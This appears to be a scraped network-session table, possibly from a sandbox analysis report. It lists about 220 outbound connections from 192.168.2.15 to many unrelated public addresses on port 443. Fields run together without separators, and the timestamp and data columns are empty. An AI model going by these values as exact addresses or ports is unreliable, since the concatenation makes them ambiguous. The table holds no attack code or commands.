                                            16740192.168.2.1553092131.64.185.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16741192.168.2.1536470179.1.146.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16742192.168.2.1545758180.242.207.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16743192.168.2.1558854141.132.248.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16744192.168.2.1551298190.19.75.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16745192.168.2.155290070.111.117.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16746192.168.2.1556662171.143.216.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16747192.168.2.154483252.181.29.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16748192.168.2.155800019.56.181.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16749192.168.2.1535790148.117.86.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16750192.168.2.1556604171.233.1.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16751192.168.2.1545852210.243.147.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16752192.168.2.1548162117.160.132.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16753192.168.2.153398038.12.149.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16754192.168.2.1533338108.219.149.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16755192.168.2.154177691.98.176.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16756192.168.2.153621283.243.41.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16757192.168.2.1550526109.205.138.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16758192.168.2.155679819.1.214.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16759192.168.2.1534426197.125.26.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16760192.168.2.1558552134.218.255.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16761192.168.2.1539306130.41.72.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16762192.168.2.154364283.85.21.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16763192.168.2.155401294.71.193.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16764192.168.2.1551096152.59.254.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16765192.168.2.154198289.235.211.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16766192.168.2.1557462160.207.133.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16767192.168.2.1534766183.14.74.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16768192.168.2.153755074.30.93.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16769192.168.2.153936679.75.92.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16770192.168.2.1552404142.99.122.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16771192.168.2.1549984212.111.17.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16772192.168.2.155314643.25.49.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16773192.168.2.155814642.205.73.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16774192.168.2.1556796166.100.91.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16775192.168.2.1557360145.13.71.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16776192.168.2.1539046137.102.50.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16777192.168.2.1556870222.113.78.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16778192.168.2.1533924193.43.230.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16779192.168.2.1535920180.73.66.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16780192.168.2.153759283.252.52.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16781192.168.2.1543570153.154.6.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16782192.168.2.1534596122.170.33.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16783192.168.2.1536534209.35.72.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16784192.168.2.1558316201.237.81.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16785192.168.2.1538534158.26.241.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16786192.168.2.1542618181.85.241.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16787192.168.2.1550958220.210.6.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16788192.168.2.153946464.125.42.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16789192.168.2.15490209.12.194.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16790192.168.2.1553812177.197.25.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16791192.168.2.153770289.109.248.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16792192.168.2.1539294126.40.186.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16793192.168.2.1545422116.242.193.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16794192.168.2.1534438101.194.59.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16795192.168.2.153496674.117.125.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16796192.168.2.1558530132.137.33.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16797192.168.2.1554740125.59.76.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16798192.168.2.1554670203.144.33.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16799192.168.2.1548006168.11.96.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16800192.168.2.153680486.150.68.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16801192.168.2.1536464181.42.15.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16802192.168.2.1539930103.101.79.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16803192.168.2.154451066.252.54.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16804192.168.2.1551226136.56.197.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16805192.168.2.1537660196.1.123.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16806192.168.2.153607475.238.28.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16807192.168.2.154662887.106.133.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16808192.168.2.1558942133.137.37.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16809192.168.2.154381258.54.236.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16810192.168.2.1549792175.163.100.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16811192.168.2.155221020.118.63.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16812192.168.2.1542824147.153.115.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16813192.168.2.1559466161.235.53.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16814192.168.2.1545220182.90.158.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16815192.168.2.153671837.177.42.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16816192.168.2.155075819.54.11.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16817192.168.2.1546924155.147.179.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16818192.168.2.1533072182.247.147.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16819192.168.2.153784291.91.44.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16820192.168.2.155226457.34.84.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16821192.168.2.155144447.126.47.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16822192.168.2.155428692.145.11.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16823192.168.2.1555092204.46.18.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16824192.168.2.1550952186.205.20.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16825192.168.2.1558764122.241.78.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16826192.168.2.1535342175.103.141.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16827192.168.2.154161292.42.76.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16828192.168.2.1545308121.71.104.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16829192.168.2.1560096197.167.82.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16830192.168.2.1546174189.0.84.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16831192.168.2.155342293.96.105.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16832192.168.2.1535826199.16.177.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16833192.168.2.155837413.196.224.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16834192.168.2.1556328149.94.193.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16835192.168.2.1548892169.119.231.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16836192.168.2.1534666154.212.18.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16837192.168.2.1560500155.147.11.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16838192.168.2.1560192155.211.253.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16839192.168.2.155236036.54.149.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16840192.168.2.1539836163.194.142.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16841192.168.2.1539526175.24.165.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16842192.168.2.153959091.174.49.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16843192.168.2.153874035.114.180.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16844192.168.2.154371884.225.31.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16845192.168.2.1546552171.52.165.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16846192.168.2.155114464.173.207.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16847192.168.2.1537882123.133.104.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16848192.168.2.1550338140.74.74.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16849192.168.2.15589582.94.219.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16850192.168.2.154595671.87.234.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16851192.168.2.1542066108.205.102.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16852192.168.2.1537056154.112.0.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16853192.168.2.154615491.47.151.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16854192.168.2.1550658129.142.185.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16855192.168.2.1544218171.188.94.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16856192.168.2.1558344154.36.167.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16857192.168.2.155464274.240.115.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16858192.168.2.1549958184.254.254.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16859192.168.2.1539156117.60.99.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16860192.168.2.153321894.23.137.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16861192.168.2.1543266151.59.203.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16862192.168.2.1543928212.83.138.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16863192.168.2.1543300140.75.87.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16864192.168.2.1560446143.186.123.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16865192.168.2.155604648.25.160.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16866192.168.2.1533600182.153.73.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16867192.168.2.1546606169.219.166.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16868192.168.2.155698452.42.245.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16869192.168.2.1547918221.0.186.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16870192.168.2.1555590153.136.19.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16871192.168.2.1551216196.251.17.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16872192.168.2.1554990182.48.181.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16873192.168.2.1557244212.22.209.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16874192.168.2.155617873.63.245.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16875192.168.2.1557850206.62.102.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16876192.168.2.1556210165.218.106.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16877192.168.2.1558434144.29.59.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16878192.168.2.154130079.247.83.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16879192.168.2.155335472.62.228.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16880192.168.2.1548442191.8.210.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16881192.168.2.1544726170.10.245.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16882192.168.2.15573501.213.89.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16883192.168.2.1542596118.13.105.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16884192.168.2.154203659.141.59.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16885192.168.2.1547010209.62.30.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16886192.168.2.153591450.225.135.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16887192.168.2.154452019.220.152.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16888192.168.2.1556698179.248.228.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16889192.168.2.1539406120.240.121.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16890192.168.2.1553888117.66.217.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16891192.168.2.154369613.33.46.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16892192.168.2.1542622221.166.82.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16893192.168.2.1552708173.158.8.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16894192.168.2.1549430205.10.204.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16895192.168.2.156086027.227.132.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16896192.168.2.153755684.221.145.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16897192.168.2.1546250121.56.60.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16898192.168.2.1538224125.15.172.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16899192.168.2.1554550209.152.236.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16900192.168.2.1541682217.67.28.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16901192.168.2.1540286105.90.143.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16902192.168.2.154843834.163.184.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16903192.168.2.1550940133.86.214.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16904192.168.2.155927882.114.181.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16905192.168.2.1556684146.223.141.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16906192.168.2.1555652149.63.212.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16907192.168.2.1560416167.67.35.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16908192.168.2.1534962219.128.213.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16909192.168.2.1537596132.86.212.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16910192.168.2.154822636.28.105.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16911192.168.2.153285269.154.251.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16912192.168.2.1541414181.228.23.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16913192.168.2.1546604211.78.216.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16914192.168.2.1536570190.144.167.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16915192.168.2.1540768118.87.249.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16916192.168.2.155859243.90.228.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16917192.168.2.155323620.16.42.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16918192.168.2.153413431.128.196.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16919192.168.2.1542600209.191.228.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16920192.168.2.1545134147.162.86.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16921192.168.2.1542720168.236.145.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16922192.168.2.154085674.146.131.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16923192.168.2.15554288.185.139.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16924192.168.2.153899642.150.45.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16925192.168.2.1537520213.185.67.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16926192.168.2.153406017.218.62.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16927192.168.2.1546848192.220.255.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16928192.168.2.1541184121.35.204.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16929192.168.2.153577691.168.244.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16930192.168.2.1541184199.254.8.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16931192.168.2.154175686.150.245.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16932192.168.2.1540726164.101.83.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16933192.168.2.155734842.47.185.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16934192.168.2.1558346113.246.175.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16935192.168.2.1543328157.218.182.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16936192.168.2.153744644.40.100.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16937192.168.2.153529868.61.41.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16938192.168.2.1559244136.99.210.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16939192.168.2.1545888213.84.50.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16940192.168.2.1555452117.84.89.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16941192.168.2.154334432.59.239.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16942192.168.2.1538372137.33.94.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16943192.168.2.155326287.63.95.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16944192.168.2.1555176156.44.174.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16945192.168.2.154403060.232.119.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16946192.168.2.1555330140.230.35.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16947192.168.2.155236299.17.16.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16948192.168.2.154437077.159.70.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16949192.168.2.1556508123.78.237.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16950192.168.2.1545996169.45.53.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16951192.168.2.1554032176.149.22.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16952192.168.2.155592276.78.236.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16953192.168.2.1539550114.206.69.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16954192.168.2.1546190115.205.158.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16955192.168.2.1534296128.33.182.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16956192.168.2.1535752148.84.141.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16957192.168.2.155502424.140.80.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16958192.168.2.155433273.81.152.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16959192.168.2.156041049.206.186.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16960192.168.2.1557604187.103.66.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16961192.168.2.154599461.2.62.202443
                                            TimestampBytes transferredDirectionData


